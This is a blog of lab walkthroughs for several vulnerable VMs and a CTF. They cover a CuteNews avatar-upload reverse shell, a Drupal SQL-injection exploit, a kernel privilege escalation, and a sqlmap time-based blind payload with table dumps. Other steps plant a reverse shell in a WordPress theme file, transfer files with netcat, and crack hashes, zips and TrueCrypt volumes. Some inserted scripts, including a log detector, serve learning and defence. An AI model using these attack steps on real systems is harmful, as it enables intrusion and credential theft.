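Only the client-to-server direction is fed in; the doubled characters in the follow-stream view (l.le.ev.ve.el.l8.8) are the server echoing each keystroke back, so they disappear once the two directions are separated.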

Level 09

I will continue some other day.

Walkthrough Simple

I tried out another vulnerable machine. This one was called Simple. And can be found here.

So I started out as usual by locating the machine.

 $ netdiscover -r
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
                 e8:de:27:31:15:ee      1      60  TP-LINK TECHNOLOGIES CO.,LTD.
                 08:00:27:60:21:5c      1      60  Cadmus Computer Systems

nmap -A -O -T4 -p- -vv

Only port 80 open. So I browsed over there.
I was met by the interface of some kind of news-service called CuteNews. It had the version written on the first page: CuteNews v.2.0.3. And what I had learned from the last VM I did was that it is always a good idea to search for exploits (duh). So before going ahead with dirbuster/zap/nikto/whatevs I just searched for CuteNews in exploit-db. And that was a great idea.
So I just checked out the very first that came up, and it looked easy. It was this one. So I went ahead and created an account, renamed my php-reverse-shell.php to shell.jpg. Then I intercepted it with burp-suite and changed the name back to php.
And then I just started nc with nc -lvp 4444. And after visiting: cutenews.dev/uploads/avatar_username_shell.php I was rewarded with a shell.
I sent over my enumeration-script that I am working on with netcat.

nc -lvp 3333 > enum.sh
nc < enum.sh

I soon found out that it has the same privesc-vulnerability as the machine I was working on the other day. So I already had the exploit ready to go. It was this one. I sent it over with netcat and then compiled it with gcc, then chmod +x. And then I was root, and got the flag in the /root folder.



I felt like all the hard work before really paid off on this one. I knew the exploits, I knew how to transfer files easily. This was a great little project.

Walkthrough Droopy

Another walkthrough. This time for the Droopy-vm. It can be found here on vulnhub.com

I tried out netdiscover, just to learn something new. I have seen that other people use it. It turns out that it works to find hosts on the network. It works by sending out ARP requests throughout the network and logging the replies. I am not really sure if nmap is using a different technique. But it is good to know that there is an alternative to nmap for it.

netdiscover -r
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
                 e8:de:27:31:15:ee      1      60  TP-LINK TECHNOLOGIES CO.,LTD.
                 08:00:27:65:24:9c      1      60  Cadmus Computer Systems

So I ran nmap.

nmap -vvv -A -T4 -O

80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries 
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php 
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ 
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ 
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ 
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...
MAC Address: 08:00:27:65:24:9C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4

First I thought that the MD5 was a flag or something. But then I read that that is the standard way for nmap to output if it doesn’t know the service.

The robots file is just filled with stuff.

Among the many files was this.
Drupal 7.30, 2014-07-24

This reminded me about a huge vulnerability that was in drupal a few years ago, that I had heard about.

I continued the scanning by running nikto and then checking out the info.php file to see what I could find.

This is some of all the info.

PHP Version 5.5.9-1ubuntu4.5
Hostname:Port droopy.knight139.co.uk:80 
User/Group www-data(33)/33 
Apache Version Apache/2.4.7 (Ubuntu) 
Loaded Modules core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php5 mod_rewrite mod_setenvif mod_status 

DOCUMENT_ROOT /var/www/html 
SERVER_ADMIN webmaster@localhost 

Client API version 5.5.40 

PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 

The default apache-page was also found.

I tried to brute-force the login. This made the server block my IP. And I also think I made it run out of memory or something. Because it subsequently crashed. Great. So I restarted the VM fresh again. And this time I checked out the drupal exploit.

So I searched for exploits on the exploits-database.
There I found four exploits that are called something along the lines of: Drupal Core <= 7.32 – SQL Injection.
Or similar. Two were written in python two in php. I just picked one, and downloaded it and ran it. Which was pretty stupid, because I created, by default in the exploit, a user with the username admin. So I overwrote the original user.
So once I later gained access, and checked in the database. I only found my own user. Otherwise I would have been able to crack the hash of the original user and that password could have been good to know.

Anyhow, I gained access and after some googling I figured out how to allow php in drupal (modules/php-filter). And I uploaded the php-reverse-shell.php that I found here:

Privilege escalation

Now I had a shell as user www-data. So I went to /tmp and started netcat to transfer my enumeration-file.

nc -lvp 3333 > enum.sh

Then I sent the file with:

nc 3333 < enum.sh

Then: chmod +x enum.sh

Among other things I found:

uid=1000(gsuser) gid=1000(gsuser) groups=1000(gsuser),24(cdrom),30(dip),46(plugdev),110(lpadmin
hostname is:
In the hosts file I find this:
droopy.knight139.co.uk    droopy

I remembered that every web application that uses MySQL keeps the database credentials in some config file. So after some snooping around I found the file:


$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'nimda',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

So I log in to mysql.

mysql -u drupaluser -p drupal
password: nimda

mysql> SHOW tables;
mysql> SELECT * FROM users;


So I went to http://www.onlinehashcrack.com/hash-identification.php#res to identify what type of hash it was.

It turns out it is a SHA-512, reported as “SHA-512(Drupal)”.

I studied the hashcat options and found this:

hashcat -m 7900 -a 0 -o found.txt admin.hash rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule

7900 is the Drupal 7 mode. With -a 0 (straight mode) the argument after the hash file is the wordlist, and a rule file is passed with -r; without -r hashcat would read the rule file as if it were the wordlist.
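Picking the wrong -m is the other easy way to waste a long hashcat run, so here is the hash identification step as a small shell script. This is an added example, not code from the walkthrough: it maps a hash's prefix to its scheme and hashcat mode (the $S$ Drupal 7 hashes from the database above are mode 7900; the $6$ sha512crypt hashes in /etc/shadow, which come up later on this page, are mode 1800). Every hash body in the script is a constructed placeholder, not a real hash.

```shell
# Added example (not from the walkthrough): identify a hash scheme from its
# prefix and map it to the hashcat mode. All hash bodies below are constructed.

# identify_hash HASH -> "<scheme> <hashcat-mode>", or "unknown -" if no prefix matches
identify_hash() {
    case "$1" in
        '$S$'*)                  echo "drupal7 7900" ;;       # Drupal 7 (phpass-style SHA-512)
        '$P$'*|'$H$'*)           echo "phpass 400" ;;         # WordPress, phpBB
        '$6$'*)                  echo "sha512crypt 1800" ;;   # glibc crypt(3), typical /etc/shadow
        '$5$'*)                  echo "sha256crypt 7400" ;;
        '$1$'*)                  echo "md5crypt 500" ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo "bcrypt 3200" ;;
        *)                       echo "unknown -" ;;          # unsalted/raw hashes need length checks instead
    esac
}

# hashcat_mode HASH -> just the mode number (or "-")
hashcat_mode() {
    info=$(identify_hash "$1")
    echo "${info##* }"
}

# shadow_modes FILE: for every "user:hash:..." line print "user mode", skipping
# locked or empty password fields ("*", "!", "!!", "!$6$...").
shadow_modes() {
    while IFS=: read -r user hash _rest; do
        case "$hash" in
            ''|'*'|'!'*) continue ;;
        esac
        echo "$user $(hashcat_mode "$hash")"
    done < "$1"
}

# Stand-alone demo on a constructed shadow-style file (hash bodies are fake).
demo_shadow=$(mktemp)
cat > "$demo_shadow" <<'EOF'
root:$6$saltsalt$CONSTRUCTEDsha512cryptBODYxxxxxxxxxxxxxxxxxxxxx:16800:0:99999:7:::
daemon:*:16800:0:99999:7:::
candycane:$6$saltsalt$CONSTRUCTEDanotherBODYyyyyyyyyyyyyyyyyyyyy:16800:0:99999:7:::
EOF
shadow_modes "$demo_shadow"      # prints: root 1800 / candycane 1800
rm -f "$demo_shadow"
```

Run it on a real shadow or database dump by pointing shadow_modes at the file; the output tells you how many separate hashcat invocations (one per mode) you actually need.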

Meanwhile I continued looking around and found an email in /var/spool/mail:

From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN


   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam


Okay, so it talks about an encrypted file. From a guy named Dave.

It looks like the encrypted file can be decrypted with a password that is found in the rockyou dictionary.
We also know that the password is less than 11 characters, and it has something to do with an academy.
And it is also the name of a song by the Jam.

So I started listening to some songs by The Jam and started looking for the encrypted file. But I couldn’t really find anything useful.

After some minor cheating I learned that it is a good idea to look for privilege-escalation exploits. So I searched the exploit database again and found several exploits. I downloaded this one: https://www.exploit-db.com/exploits/37292/
I transferred it over to the VM with nc. Then gcc, chmod and execute, and now I am root. BOOM! Fast when stuff just works.

In /root I found a file called dave.tc.
After some googling I found out that .tc is probably a TrueCrypt file. And after some more googling I learned that there is a program called truecrack.
After a lot of struggling I found that with sed we can remove all words in our dictionary that are shorter than 11 characters.

I did it with this command.
The -i flag is important. It makes the changes in the current file. Without it nothing happens. As I learned.

sed -i -r '/^.{0,10}$/d' rr.txt   

So now we have a list of 1.8 million words.
wc -l rr.txt
1879453 rr.txt

Then I did
grep acade rr.txt > rr2.txt

This keeps all words containing “acade”, since academy was mentioned in the email.
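The same narrowing, written as reusable shell functions rather than an in-place sed edit, as an added example that is not part of the walkthrough. The walkthrough's `sed -i -r '/^.{0,10}$/d'` keeps words of 11 or more characters and `grep acade` keeps the academy-related ones; the functions below do both without touching the source list, and the demo shows both readings of the email's length hint (“not longer than 11” versus the walkthrough's “not shorter than 11”). The word list in the demo is constructed; a real run would point shape_wordlist at rockyou.txt.

```shell
# Added example (not from the walkthrough): narrow a dictionary with the
# constraints from Dave's email before handing it to truecrack or hashcat.
# The word list below is constructed.

# keep_length FILE MIN MAX: keep lines whose length is between MIN and MAX inclusive
keep_length() {
    awk -v min="$2" -v max="$3" 'length($0) >= min && length($0) <= max' "$1"
}

# shape_wordlist FILE MIN MAX PATTERN: length filter, then case-insensitive substring match.
# grep exits non-zero when nothing matches; "|| :" keeps an empty result from being an error.
shape_wordlist() {
    keep_length "$1" "$2" "$3" | { grep -i -- "$4" || :; }
}

# count_lines [FILE]: like `wc -l` but without the leading spaces some systems print
count_lines() {
    awk 'END { print NR }' "$@"
}

# Stand-alone demo on a constructed list.
demo_list=$(mktemp)
cat > "$demo_list" <<'EOF'
ron
academy
rockyou123
etonacademy
cadetacademy2
academyofrock
EOF
# The email says the password "isn't longer than 11 characters" (MAX=11); the
# walkthrough instead dropped everything shorter than 11 (MIN=11). The string
# etonacademy is 11 characters, so both readings keep it:
shape_wordlist "$demo_list" 11 11 acade                  # prints: etonacademy
shape_wordlist "$demo_list" 1 11 acade | count_lines     # prints: 2
shape_wordlist "$demo_list" 11 1000 acade | count_lines  # prints: 3
rm -f "$demo_list"
```

Keeping the original list untouched matters more than it looks: the walkthrough's -i edit is destructive, and if the length guess turns out wrong the only way back is to re-download the dictionary.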

Then I ran truecrack:

truecrack -t dave.tc -k sha512 -b 8 -w rr2.txt -v 

Found password:		"etonacademy"
Password length:	"12"

On this page I learned how to mount a truecrypt-volume. So I did that.

mkdir /media/dave

mount /dev/mapper/dave /media/dave
ls /media/dave/
buller  lost+found  panama

In the buller dir there is a file called bullingdon-crest.

Now I get it. The Dave character is David Cameron. And I guess the shares.jpg refers to his corrupt family’s holdings in off-shore banks. And the pig in .secret is of course the infamous pig he most likely fucked. And in the .top dir is the flag. Pretty clever ending to a great VM!


So on this VM I really learned a lot!
The most important thing I think was: always check the exploit-database!
All it really took was to search for two exploits to gain root. First to enter drupal-admin and then to elevate to root.

I really liked it because it felt very real. The drupal and priv-escalation exploits are both very real. Thanks to knightmare for a great VM!

Walkthrough SkyDog Con CTF – The Legend Begins

Okay, I wish I could say that I really solved this but I didn’t get all the flags. But I am going to do a write up anyways, to not forget what I learned.

The CTF is called SkyDog Con CTF – The Legend Begins, and can be found here. Thanks James Bower for a fun CTF!


The CTF is a virtual machine and works best in Virtual Box. This OVA was created using Virtual Box 4.3.32. Download the OVA file open up Virtual Box and then select File –> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file above it is best to disable the USB 2.0 setting before booting up the VM. The networking is setup for a NAT Network but you can change this before booting up depending on your networking setup. If you have any questions please send me a message on Twitter @jamesbower and I’ll be happy to help.

Goal of Sky Dog Con CTF

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.


The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533}

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

First flag

Let’s search the network and scan the machine.

$ nmap -v

Nmap scan report for
Host is up (0.0053s latency).
Not shown: 998 closed ports
22/tcp open  ssh
80/tcp open  http

$ nmap -A -T4 -v -p-

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
|   2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
|_  256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Okay, so we got ssh and port 80. Nmap also revealed that there’s a lot going on in robots.txt.

But first I want to check out port 80.
On the first page there is an image. I remember the name of the first flag: “Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)”. Okay, so I download the image and check it out in exiftool.

wget http://skydog.dev/SkyDogCon_CTF.jpg

exiftool SkyDogCon_CTF.jpg

And BAM first flag. Found in the comment.

XP Comment                      : flag{abc40a2d4e023b42bd1ff04891549ae2}

This is when I started getting cocky. If it is this easy, it’s gonna be a breeze. Shame on me.

Now I check out the robots.txt file. And BOOM another flag.

# Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}

So in the robots file there were a lot of entries. Many of them looked like this:
Allow: /?hl=*&gws_rd=ssl$
Disallow: /?hl=*&*&gws_rd=ssl
Allow: /?gws_rd=ssl$
Allow: /?pt1=true$

I was sure that this was meant for some sql-injections. So I fired up sqlmap, but nothing.

So I figured that I would see which of all the pages worked, because most of them 404ed. So in order to do that in an efficient way (and inefficient, since nikto already told me which pages responded with 200) I figured that it would be fun to do it with bash.

There are probably a million ways to write this code in a better way. But it worked for me.

First I used cut to cut out all the urls and store them in a file I called robbo.

cut -d/ -f2-5 robots.txt > robbo 

Then I wrote and ran this little script, which outputs the headers of the requests into the file output.


while read p; do
  #echo $p
  echo http://skydog.dev/"$p" >> output
  curl --head http://skydog.dev/"$p" >> output
done <robbo

Then I ran grep on that file to show me all the 200s.

grep 200 -A 3 -B 3 output

So yeah, not very efficient. But it led me to this url: http://skydog.dev/Setec/
But that was not really thanks to my crappy script. I had found it when I used the spider in ZAP as well. Anyways, that page led me to this: http://skydog.dev/Setec/Astronomy/ where I found the zip file Whistler.zip.

I downloaded it and tried to open it. But it required a password. So I started googling and found fcrackzip. And I started playing around with it. But in the end I ran the wrong command:

$ fcrackzip -D -p rockyou.txt Whistler.zip

possible pw found: yourmother ()
possible pw found: jinglebells ()
possible pw found: 200595 ()
possible pw found: spellman ()
possible pw found: jenny86 ()
possible pw found: julie10 ()
possible pw found: nascar7 ()
possible pw found: millie25 ()
possible pw found: hackett1 ()
possible pw found: chrebet ()

It just returned tens of possible passwords.

I should have run it like this:

fcrackzip -D -v -u -p rockyou.txt Whistler.zip

found file 'flag.txt', (size cp/uc     50/    38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc     72/    61, flags 9, chk 83b5)

PASSWORD FOUND!!!!: pw == yourmother

Yeah, I was stuck here and thought that there was something wrong with the program or something. So I cheated a bit and learned the correct way to use fcrackzip.

I got the flag: flag{1871a3c1da602bf471d3d76cc60cdb9b} and a clue for the next flag:
“Time to break out those binoculars and start doing some OSINT”

So I started googeling about OSINT.
OSINT stands for Open Source Intelligence, something I didn’t know of before reading about it. After reading about it on Wikipedia I gathered that it doesn’t mean open source in the programmer’s sense; it means public, as in gathering publicly available information. The term comes from the intelligence community.

Here I got really stuck again. And so I cheated. Again. Sorry.
I read in another walkthrough that the author had taken words from the IMDb page of the movie Sneakers and run them through DirBuster.

So I did that as well.

I downloaded the movie script. Then I wrote the following bash-script:


for word in $(<sound.txt); do
    echo "$word" >> sneakersWord2.txt
done

It takes sound.txt as input and writes each word on its own line in the output file, which I then used in ZAP.
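The loop above keeps punctuation and case, so “Secrets!” and “secrets” end up as two different, partly useless entries. Here is the same idea done as functions, as an added example that is not from the walkthrough: lower-case the text, split on anything that is not a letter or digit, drop the very short tokens and de-duplicate, and optionally emit Capitalised and UPPER variants since directory names on the server are case-sensitive. The sample text is constructed; run words_from_text on your own file (the walkthrough's sound.txt).

```shell
# Added example (not from the walkthrough): build a directory-brute-forcing
# wordlist from a text file. The sample text is constructed.

# words_from_text FILE [MIN]: one unique lower-case word per line, at least MIN
# characters long (default 3, to skip "a", "to", "of" and similar noise)
words_from_text() {
    tr '[:upper:]' '[:lower:]' < "$1" \
    | tr -cs '[:alnum:]' '\n' \
    | awk -v min="${2:-3}" 'length($0) >= min' \
    | LC_ALL=C sort -u
}

# with_variants FILE: each word plus its Capitalised and UPPER forms
with_variants() {
    words_from_text "$1" | awk '{
        print $0
        print toupper(substr($0, 1, 1)) substr($0, 2)
        print toupper($0)
    }' | LC_ALL=C sort -u
}

# Stand-alone demo on a constructed line of "script".
demo_text=$(mktemp)
cat > "$demo_text" <<'EOF'
Setec Astronomy. "Too many secrets!" Cosmo said: too many secrets, Marty.
EOF
words_from_text "$demo_text"                          # 8 words: astronomy cosmo many marty said secrets setec too
with_variants "$demo_text" | awk 'END { print NR }'   # prints: 24
rm -f "$demo_text"
```

A few hundred unique words from a script is a far smaller and more targeted list than a generic directory dictionary, which is exactly why the hint pointed at the movie.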

So I found the path:


In /PlayTronics I got the flag:
And the next clue. http://skydog.dev/PlayTronics/companytraffic.pcap
A packet capture of network traffic. So I ran:

tcpick -C -yP -r companytraffic.pcap > companytraffic.txt                                                             

And started poking around in it with grep. But yeah. I didn’t really get anywhere with it. This is where I just gave up.

If you want to find the rest of the flags check out g0blin’s great write-up if you haven’t already.


I really made a lot of mistakes on this one, and some stuff was just over my head. Like somehow remaking the sound-clip from the pcap-file. That would have been cool to do.
I would have easily gotten the zip-file if I just had learned the tool a bit better.
I should also have read the instructions better! If I had done that I would have figured out that I of course should have tried to crack the MD5 hashes.

I got to play around with some more unix commands like cut, and writing a bit in bash which is always useful. I also got to try out fcrackzip, although I doubt it will ever be useful. It seems like a really old technology.

So all in all a fun CTF and I learned some more. Which in the end is the most important thing.

Walkthrough Freshly

I did another vulnerable VM. This one is called Freshly and can be found here. It is also made by tophatsec, so thanks tophatsec for another great VM. Let’s get started.

First let’s find the machine.


Great, now that we got the ip, let’s scan it.

nmap -A -T4 -p-

Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-24 12:18 CLST
Nmap scan report for
Host is up (0.00058s latency).
Not shown: 65532 closed ports
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after:  2025-02-14T03:30:05
8080/tcp open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.45 seconds

Okay, so we have port 80, SSL port 443, and port 8080. All web.
On port 80 there is just a Star Wars gif. I download it and check it out in exiftool just in case. But nothing of interest.

I fire up ZAP and start doing a Force Browse (DirBusting).
Meanwhile I check out port 8080 and port 443. Both of them seem to lead to a WordPress installation. I snoop around and find that there is a user named admin (the default user in WordPress). I try to log in with admin/admin at /wp-admin but no result. I also try a dictionary attack but without any luck. But I am not blocked, so that means there are no plugins with fail2ban-like features.

I try some SQL injections in the store but without success.

So I go back to ZAP to see what it has found. And I can see that it has found a page called /login.php and phpmyadmin. So I head over to login.php and find a login. I use sqlmap to see if there are any vulnerabilities.

So I make a request and then intercept it in Burp Suite, and copy-paste the request to a file I call request.txt. “user” is the parameter that I am testing for injections.

./sqlmap.py -r request.txt -p user

Okay, so sqlmap found a time-based blind.

Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user=' AND (SELECT * FROM (SELECT(SLEEP(5)))RRpU) AND 'wUfW'='wUfW&password=&s=Submit

I had never successfully used sqlmap before, so this was a great learning experience. So after finding out that there is a vulnerability I run the following command to get the databases. It really took a long time because it was a time-based attack.

./sqlmap.py -r request.txt -p user --dbs 


available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

Then I wanted the tables and the content, so I ran:

./sqlmap.py -r request.txt -p user --tables -D wordpress8080

Database: wordpress8080
[1 table]
| users |

./sqlmap.py -r request.txt -p user --dump -D wordpress8080 -T users
Database: wordpress8080
Table: users
[1 entry]
| username | password            |
| admin    | SuperSecretPassword |

So yeah, not so secret password. I used it to login to wordpress.
This guide was quite useful to get the hang of sqlmap.
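The other side of the sqlmap finding above is what it looks like in the server's logs. This is an added example, not from the walkthrough: a shell script that scans access-log lines for the timing primitives a time-based blind injection depends on (SLEEP(), BENCHMARK(), pg_sleep(), WAITFOR DELAY) after undoing the percent-encoding of the few characters that matter, and then lists the source addresses that sent them. The log lines are constructed. One caveat a defender needs: the walkthrough's payload travelled in a POST body, which the default access log does not record, so for POST forms this only works with request-body logging (a mod_security audit log, for instance) or logging inside the application.

```shell
# Added example (not from the walkthrough): flag time-based SQL injection
# attempts in web server access logs. The log lines below are constructed.

# decode_minimal: turn "+", %20, %28 and %29 back into space, "(" and ")"
# (enough to match the function-call shapes below; not a full URL decoder)
decode_minimal() {
    sed -e 's/+/ /g' -e 's/%20/ /g' -e 's/%28/(/g' -e 's/%29/)/g'
}

# flag_sqli_timing LOGFILE: print each line that contains a timing primitive.
# "|| :" keeps an empty result from being treated as an error.
flag_sqli_timing() {
    decode_minimal < "$1" \
    | { grep -i -E 'SLEEP *\(|BENCHMARK *\(|pg_sleep *\(|WAITFOR +DELAY' || :; }
}

# suspicious_clients LOGFILE: "ip count" for every source that sent a flagged
# request, the list you would feed into a block rule or an alert
suspicious_clients() {
    flag_sqli_timing "$1" | awk '{ print $1 }' | LC_ALL=C sort | uniq -c | awk '{ print $2, $1 }'
}

# Stand-alone demo on constructed Apache combined-format lines.
demo_log=$(mktemp)
cat > "$demo_log" <<'EOF'
10.0.0.5 - - [24/Apr/2016:12:30:01 -0300] "GET /login.php?user=admin&password=x HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Apr/2016:12:30:07 -0300] "GET /login.php?user=%27+AND+SLEEP%285%29--+&password= HTTP/1.1" 200 512 "-" "sqlmap/1.0"
10.0.0.9 - - [24/Apr/2016:12:31:14 -0300] "GET /store.php?id=1%29+OR+BENCHMARK%285000000%2C1%29--+ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Apr/2016:12:31:20 -0300] "GET /store.php?id=1;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [24/Apr/2016:12:32:00 -0300] "GET /store.php?id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF
flag_sqli_timing "$demo_log" | awk 'END { print NR }'   # prints: 3
suspicious_clients "$demo_log"                          # prints: 10.0.0.5 1 / 10.0.0.9 2
rm -f "$demo_log"
```

Pattern matching like this catches the default sqlmap payloads; the stronger signal is a cluster of requests from one client whose response times step up in suspiciously regular increments, which needs the request duration in the log format (Apache's %D) rather than just the request line.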

So, admin on a CMS usually means shell. So I went to appearance/editor and then I just copy-pasted my reverse shell into header.php. Probably not the most silent way, but it is easy to remove the code after it has been executed.
Then I fired up netcat. With:

nc -v -l 1234

-v stands for verbose. -l for listening. And 1234 is the port. The -p flag is not really needed to define the port.

Make sure that your firewall is open.

sudo ufw allow 1234

So, now I got a shell with the user daemon

uid=1(daemon) gid=1(daemon) groups=1(daemon)

I create a file in /tmp called linEnum.sh where I copy-paste the contents of LinEnum. Then:

chmod +x linEnum.sh

To enumerate important and interesting files. It outputs a lot of stuff, among others this:


And the following in /etc/shadow


There is also a message in the shadow-file:

I thought I had to reach root, so I didn’t really think of this as the flag. So I copied the hashes and started running hashcat on them, which was fun as it was the first time. So I ran it on all three hashes, with the following command.

./hashcat-cli64.bin -m 1800 -a 0 -o found.txt --remove candycane.hash ~/sectools/SecLists/Passwords/10_million_password_list_top_100000.txt

I only found the password for candycane which was “password”. I didn’t manage to crack the other users.

Now I wanted to su to candycane, but it didn’t work since I didn’t have a tty shell. And running

import pty; pty.spawn('/bin/bash')

this didn’t work. But I found a workaround.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py
python /tmp/shell.py

So this gave me a tty-shell and I could run su candycane.

So, here I got stuck a while and started looking back in my notes to see if I had missed something. So I took out the content from the database login:

Database: login
Table: users
[2 entries]
| password | user_name |
| password | candyshop |
| PopRocks | Sir       |

And I tried these passwords on user and root. But it didn’t work. After many other tries enumerating the system I gave up. And on some other walkthroughs I found that the password for user (which was a sudo-user) and root was SuperSecretPassword. So that was a little bit annoying that I never tried that. And I also found out that it was the same password for the mysql-root user. Which could be found in the login.php-file. So that was a little bit stupid that I never checked that.


All in all it was a great VM. I got to learn tools like hashcat and sqlmap, which I am sure will come in handy on other VMs. I also learned about wpscan while reading other walkthroughs. I was surprised that SuperSecretPassword was not found in my password-dictionaries that I tried.

Other things that I missed was playing around with phpmyadmin. I read in some other walkthroughs that you could figure out the DBMS from it. That would have been good.

But at least I got the flags.